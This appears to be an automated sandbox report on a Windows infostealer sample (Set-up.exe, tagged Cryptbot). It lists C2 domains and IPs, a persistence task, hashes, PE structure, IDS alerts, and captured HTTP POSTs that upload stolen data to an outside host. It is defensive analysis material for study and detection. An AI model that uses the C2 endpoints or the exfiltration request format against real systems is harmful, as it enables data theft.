https://serviceupdate32.com/update	Set-up.exe	false	18%, Virustotal, Browse	unknown
http://twelvevx12vs.top/O	Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://twelvevx12vs.top/G	Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://twelvevx12vs.top/	Set-up.exe, Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2185018616.0000000001978000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.ecosia.org/newtab/	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://twelvevx12vs.top/d	Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://twelvevx12vs.top/?	Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://twelvevx12vs.top/v1/upload.php	Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.38.182.221	twelvevx12vs.top	Russian Federation		49505	SELECTELRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522675
Start date and time:	2024-09-30 15:16:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 4816 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:17:12	API Interceptor	3x Sleep call for process: Set-up.exe modified
09:18:39	API Interceptor	513x Sleep call for process: service123.exe modified
15:18:06	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.38.182.221	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevx12vs.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	elevenvx11vs.top/v1/upload.php
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz	Browse	fivevh5pt.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivevh5pt.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz	Browse	fivevh5ht.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivevh5ht.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevf12vt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevf12vt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevf12vt.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
twelvevx12vs.top	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SELECTELRU	file.exe	Get hash	malicious	Stealc	Browse	176.113.115.187
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
	http://www.goo.su/c1Rnox/	Get hash	malicious	Unknown	Browse	185.149.242.236
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz	Browse	176.113.115.95
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	176.113.115.95
	https://www.lightsourcebp.com/	Get hash	malicious	Unknown	Browse	37.9.4.115

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05438264962050686
Encrypted:	false
SSDEEP:	24576:EcPTcBW/JcVKWdJ8ajn0+jUcChQ5d0Wcn/5IfGSVVDpGlBVE:MHC24WcnmfdVd8lBVE
MD5:	E645BED2F30A4D82D181A24097ABB3D7
SHA1:	40B75AB574F00CF6ABDED1D121A6B2DCFC8C86E7
SHA-256:	E5D90BB718C0EFBE158A427A23CC1AB47683982BAEA6C73ED500A6EE28A100E2
SHA-512:	0A01646BD102B061266B311BF5FEC712934295B45CBD2F67E040B0508DE2A234BEFB86C6B75CF162603F4C6D05750A760E181EE37CD403B5A384E43800D9DD37
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.f...........#...(...........................h.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.002340573114054652
Encrypted:	false
SSDEEP:
MD5:	6959DF077AFAD94D152558F4AAE964E4
SHA1:	F2780B8BD8F1F0B62CECC0D9E9E029E99E5F7ACA
SHA-256:	AAFA764F33CEF9EA22F62D69CCC8B56580FFB1B46FBCBF04A092B393BCCCFDDA
SHA-512:	286BEF1D2DFAA9DB79A5414E82453D60F9E6AD7A042573709F9844EA078378E3837B6CE8D2B96E28E640133F2372F43C8FC6C8FC9A16D6E328A3D3DA0EBE88C3
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.f...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.7843977183147035
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	9'991'168 bytes
MD5:	fb481c39ea41b8bd7743bf3a9d730e76
SHA1:	57fb93e92efa53e80fb196d5fbb3717783c54809
SHA256:	ec23c516e7dcc1783530369419e6ce7333a228f4e5209216d70e8489048e3ab4
SHA512:	e96cb92d7025078b552b0078250c696a21ccee97d4391ef9b821a1bbe3f30da25590c2f836bc77bf6017fc97213155a6dd0d27d2bea50e3881f57e451fd7b853
SSDEEP:	49152:k76FrZK4K+1biTX+KZJqe2eO+3nXn0E1Qt5JhGWH/v27LIYoMRBW:fFroh+1biTXNZge
TLSH:	3EA6D562DD8781FDE19729B8A016B37F1634EB05891ECA38DF44EBD1DB31A3CD4AA015
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1N.f...............(.J,..p...............`,...@.......................................@... ......................`..B..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66FA4E31 [Mon Sep 30 07:07:29 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D45070h], 00000001h
jmp 00007FC84D16E826h
nop
mov dword ptr [00D45070h], 00000000h
jmp 00007FC84D16E816h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FC84D17CF26h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D37000h
call dword ptr [00D4722Ch]
sub esp, 04h
test eax, eax
je 00007FC84D16EBE5h
mov ebx, eax
mov dword ptr [esp], 00D37000h
call dword ptr [00D4724Ch]
mov edi, dword ptr [00D47234h]
sub esp, 04h
mov dword ptr [00D45028h], eax
mov dword ptr [esp+04h], 00D37013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D37029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C6004h], eax
test esi, esi
je 00007FC84D16EB83h
mov dword ptr [esp+04h], 00D4502Ch
mov dword ptr [esp], 00D42104h
call esi
mov dword ptr [esp], 00401580h
call 00007FC84D16EAD3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x946000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x947000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94a000	0x43ed4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x940004	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94720c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c4968	0x2c4a00	18dd6852564bf38f291f73b8b03a8460	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c6000	0x670ec0	0x671000	b44153d45e34d1e1e6087a4c7984ef99	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x937000	0xa134	0xa200	0bcc5e20a0f4ab291bc8f79e38022c78	False	0.3819444444444444	data	4.46248623447281	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x942000	0x21d8	0x2200	cbc7d161edc548c94c262f7efeebaeaa	False	0.32536764705882354	data	4.862464893780046	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x945000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x946000	0x42	0x200	6826632dd01734eb7baa56cb1d2f3c4b	False	0.123046875	data	0.7272198426899718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x947000	0xa98	0xc00	fdf75f003aba432b5bed905a28d9330a	False	0.380859375	data	4.719938472140673	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x948000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x949000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x94a000	0x43ed4	0x44000	15f1a2cd0d7223647d9dcc2ff77c5f2b	False	0.21814682904411764	data	6.837650033592277	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5b1050

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T15:17:13.955738+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49704	84.38.182.221	80	TCP
2024-09-30T15:17:17.635225+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49706	84.38.182.221	80	TCP
2024-09-30T15:17:22.491886+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49712	84.38.182.221	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:17:13.230604887 CEST	49704	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:13.235403061 CEST	80	49704	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:13.235474110 CEST	49704	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:13.235656023 CEST	49704	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:13.235667944 CEST	49704	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:13.241554022 CEST	80	49704	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:13.241790056 CEST	80	49704	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:13.955569029 CEST	80	49704	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:13.955738068 CEST	49704	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:13.955836058 CEST	80	49704	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:13.955914974 CEST	49704	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:13.960625887 CEST	80	49704	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.574786901 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.579564095 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.579629898 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.579714060 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.579781055 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.584964037 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585021973 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585175037 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585227013 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585258007 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585268974 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585277081 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585305929 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585321903 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585468054 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585510969 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585545063 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585591078 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585623980 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585633039 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585659981 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.585669041 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585694075 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.585694075 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.590329885 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.590361118 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.590368986 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.590377092 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.590420961 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.590424061 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.590430975 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.590481043 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.590481043 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.590501070 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.635087013 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.635225058 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.687127113 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.687226057 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.734287977 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:17.735107899 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:17.740293980 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:18.051620960 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:18.502485991 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:18.502496958 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:18.502686024 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:18.502756119 CEST	49706	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:18.509150982 CEST	80	49706	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.664993048 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.669821024 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.669893026 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.670046091 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.670089960 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.674889088 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.674928904 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.674943924 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.674964905 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.674973965 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.674994946 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.675017118 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.675017118 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.675061941 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.675146103 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.675192118 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.675221920 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.675231934 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.675240993 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.675249100 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.675295115 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.675295115 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:21.679804087 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.679812908 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.679847956 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.679856062 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.679913044 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.679920912 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:21.954672098 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:22.491621017 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:22.491672993 CEST	80	49712	84.38.182.221	192.168.2.5
Sep 30, 2024 15:17:22.491885900 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:22.492048979 CEST	49712	80	192.168.2.5	84.38.182.221
Sep 30, 2024 15:17:22.496942043 CEST	80	49712	84.38.182.221	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:17:12.552392960 CEST	52463	53	192.168.2.5	1.1.1.1
Sep 30, 2024 15:17:13.224473000 CEST	53	52463	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 15:17:12.552392960 CEST	192.168.2.5	1.1.1.1	0xb0a5	Standard query (0)	twelvevx12vs.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 15:17:13.224473000 CEST	1.1.1.1	192.168.2.5	0xb0a5	No error (0)	twelvevx12vs.top		84.38.182.221	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

twelvevx12vs.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	84.38.182.221	80	4816	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:17:13.235656023 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary41476359 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: twelvevx12vs.top
Sep 30, 2024 15:17:13.235667944 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 34 37 36 33 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 6f 78 Data Ascii: ------Boundary41476359Content-Disposition: form-data; name="file"; filename="Poxogocu.bin"Content-Type: application/octet-streamwr=!V/V~Ih Dz'1$Yr>\9iILi><v2=%KQ{$,vp>FooX
Sep 30, 2024 15:17:13.955569029 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Mon, 30 Sep 2024 13:17:13 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	84.38.182.221	80	4816	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:17:17.579714060 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary68176922 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 75959 Host: twelvevx12vs.top
